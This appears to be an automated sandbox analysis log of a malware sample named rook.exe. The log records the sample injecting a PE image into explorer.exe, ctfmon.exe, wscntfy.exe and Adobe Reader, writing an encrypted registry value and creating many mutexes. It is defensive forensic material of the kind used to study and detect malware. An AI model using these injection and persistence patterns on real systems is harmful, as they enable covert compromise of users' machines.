Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2584166480
Section loaded Path: \KnownDlls\0.3635417184612467.exe Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2584171244
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe Access: query and write and read and execute Type: image Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid invalid file for section 2584174416
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6CC HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2584179174
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6CC HWNDs: 1, 90378, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2584179838
Analysis File: rook.exe PID: 488 Parent PID: 580
+ Sections
+ General
Start time: 05:44:32
Start date: 08/12/2011
Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe
Commandline: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe
Imagebase: 0x400000
File size: 257536 bytes
MD5 hash: 8EFB904B16A3F86CC163744D85AECB5F
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 411C01
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe none 257536 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 1 411C56
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\compstui.dll write and read and execute unknown 330000 24576 own pid readonly object name not found 1
C:\WINDOWS\system32\compstui.dll query and write and read and execute image 6E680000 241664 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\MSIMG32.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\ddraw.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\ddraw.dll query and write and read and execute image 73760000 307200 own pid read write success or wait 1
\KnownDlls\DCIMAN32.dll write and read and execute unknown 73760000 307200 own pid read write object name not found 1
C:\WINDOWS\system32\dciman32.dll query and write and read and execute image 73BC0000 24576 own pid read write success or wait 1
\KnownDlls\resutils.dll write and read and execute unknown 73BC0000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\resutils.dll query and write and read and execute image 750B0000 73728 own pid read write success or wait 1
\KnownDlls\CLUSAPI.dll write and read and execute unknown 750B0000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\clusapi.dll query and write and read and execute image 76D10000 73728 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\scarddlg.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\scarddlg.dll query and write and read and execute image 5CFE0000 90112 own pid read write success or wait 1
\KnownDlls\MFC42u.DLL write and read and execute unknown 5CFE0000 90112 own pid read write object name not found 1
C:\WINDOWS\system32\mfc42u.dll query and write and read and execute image 72830000 991232 own pid read write success or wait 1
\KnownDlls\WinSCard.dll write and read and execute unknown 72830000 991232 own pid read write object name not found 1
C:\WINDOWS\system32\winscard.dll query and write and read and execute image 723D0000 114688 own pid read write success or wait 1
\KnownDlls\WTSAPI32.dll write and read and execute unknown 723D0000 114688 own pid read write object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\COMCTL32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 5D090000 630784 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 28C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 350000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 7C9C0000 8482816 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 360000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3B0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\compstui.dll read commit 2DA0000 229376 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 2DA0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3E0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3E0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 2E20000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 2ED0000 8462336 own pid readonly success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 2ED0000 8462336 own pid readonly object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 7FF0000 667648 own pid readonly success or wait 1
unknown query and write and read commit 2E60000 16384 own pid read write success or wait 1
unknown query and write and read commit 2E60000 16384 own pid read write success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 19j6cd23 Binary B2 D1 23 A5 17 5F 5B A1 9C B3 02 A6 DB 73 success or wait 1 405F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 15807505 object name not found 1 405F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 19j6cd23 object name not found 1 405F47
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{DB295FE4-E198-6ACC-FB56-FD56EA1DDE44} success or wait 1 41AFE8
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D558-B06DC413937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} success or wait 1 41A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2 41A78C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 1 41B403
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 0 41B403
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 1480000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1520 C:\WINDOWS\explorer.exe 14B01F0 4 00 00 00 00 success or wait 1 41A8A9
1520 C:\WINDOWS\explorer.exe 14B0204 4 00 00 48 01 success or wait 1 41A8C9
1520 C:\WINDOWS\explorer.exe 14B06C8 4 B8 06 00 00 success or wait 1 41A0D4
1520 C:\WINDOWS\explorer.exe 14B06CC 4 00 06 00 00 success or wait 1 41A0D4
1788 C:\WINDOWS\system32\ctfmon.exe 1110000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1788 C:\WINDOWS\system32\ctfmon.exe 11401F0 4 00 00 00 00 success or wait 1 41A8A9
1788 C:\WINDOWS\system32\ctfmon.exe 1140204 4 00 00 11 01 success or wait 1 41A8C9
1788 C:\WINDOWS\system32\ctfmon.exe 11406C8 4 44 01 00 00 success or wait 1 41A0D4
1788 C:\WINDOWS\system32\ctfmon.exe 11406CC 4 A4 01 00 00 success or wait 1 41A0D4
1860 C:\WINDOWS\system32\wscntfy.exe AE0000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1860 C:\WINDOWS\system32\wscntfy.exe B101F0 4 00 00 00 00 success or wait 1 41A8A9
1860 C:\WINDOWS\system32\wscntfy.exe B10204 4 00 00 AE 00 success or wait 1 41A8C9
1860 C:\WINDOWS\system32\wscntfy.exe B106C8 4 9C 00 00 00 success or wait 1 41A0D4
1860 C:\WINDOWS\system32\wscntfy.exe B106CC 4 A0 00 00 00 success or wait 1 41A0D4
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FC0000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 413F96
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF01F0 4 00 00 00 00 success or wait 1 41A8A9
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF0204 4 00 00 FC 05 success or wait 1 41A8C9
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF06C8 4 9C 03 00 00 success or wait 1 41A0D4
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FF06CC 4 94 03 00 00 success or wait 1 41A0D4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2E40000 13FF9C page execute and read and write success or wait 1 4E4097
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2ED0000 13FCA4 page execute and read and write success or wait 1 2E40307
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 7FF0000 13F8E0 page read and write success or wait 1 41A5EB
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 7FF0000 13F8E4 page read and write success or wait 1 41A5EB
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 2E60000 13F49C page read and write success or wait 1 411C3E
1520 C:\WINDOWS\explorer.exe 1480000 13F1FC page execute and read and write success or wait 1 413F5F
1788 C:\WINDOWS\system32\ctfmon.exe 1110000 13F1FC page execute and read and write success or wait 1 413F5F
1860 C:\WINDOWS\system32\wscntfy.exe AE0000 13F1FC page execute and read and write success or wait 1 413F5F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 5FC0000 13F1FC page execute and read and write success or wait 1 413F5F
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 400000 1000 page read and write page readonly success or wait 1 287F737
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 400000 1000 page readonly page read and write success or wait 1 287F74C
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 40050A 2446000 page execute and read and write page readonly success or wait 1 4E404E
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 40A459
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2599261498
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2599265354
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2599291089
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2599293975
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2599295403
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2599295734
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599297096
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599297252
Section loaded Path: \KnownDlls\compstui.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2599299638
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: query and write and read and execute Type: image Baseaddress: 6E680000 Size: 241664 Protection: read write Mapped to pid: own pid success or wait 2599300328
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2599302081
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2599306519
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2599307785
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2599315002
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2599317780
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2599321227
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2599325599
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2599326304
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2599328769
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2599331140
Section loaded Path: \KnownDlls\ddraw.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2599335723
Section loaded Path: C:\WINDOWS\system32\ddraw.dll Access: query and write and read and execute Type: image Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid success or wait 2599336420
Section loaded Path: \KnownDlls\DCIMAN32.dll Access: write and read and execute Type: unknown Baseaddress: 73760000 Size: 307200 Protection: read write Mapped to pid: own pid object name not found 2599338024
Section loaded Path: C:\WINDOWS\system32\dciman32.dll Access: query and write and read and execute Type: image Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2599338996
Section loaded Path: \KnownDlls\resutils.dll Access: write and read and execute Type: unknown Baseaddress: 73BC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2599343119
Section loaded Path: C:\WINDOWS\system32\resutils.dll Access: query and write and read and execute Type: image Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2599343801
Section loaded Path: \KnownDlls\CLUSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 750B0000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2599345928
Section loaded Path: C:\WINDOWS\system32\clusapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D10000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2599346459
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2599350620
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2599356603
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2599362697
Section loaded Path: \KnownDlls\scarddlg.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2599367331
Section loaded Path: C:\WINDOWS\system32\scarddlg.dll Access: query and write and read and execute Type: image Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2599368003
Section loaded Path: \KnownDlls\MFC42u.DLL Access: write and read and execute Type: unknown Baseaddress: 5CFE0000 Size: 90112 Protection: read write Mapped to pid: own pid object name not found 2599369548
Section loaded Path: C:\WINDOWS\system32\mfc42u.dll Access: query and write and read and execute Type: image Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid success or wait 2599370224
Section loaded Path: \KnownDlls\WinSCard.dll Access: write and read and execute Type: unknown Baseaddress: 72830000 Size: 991232 Protection: read write Mapped to pid: own pid object name not found 2599376229
Section loaded Path: C:\WINDOWS\system32\winscard.dll Access: query and write and read and execute Type: image Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid success or wait 2599376923
Section loaded Path: \KnownDlls\WTSAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 723D0000 Size: 114688 Protection: read write Mapped to pid: own pid object name not found 2599379718
Section loaded Path: C:\WINDOWS\system32\wtsapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2599380973
Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 76F50000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2599384020
Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2599384744
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2599386903
Section loaded Path: \KnownDlls\COMCTL32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2599393137
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid object name not found 2599397972
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2599398615
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 28C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2599403137
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2599408726
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2599410279
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2599411143
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2599414711
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid object name not found 2599422588
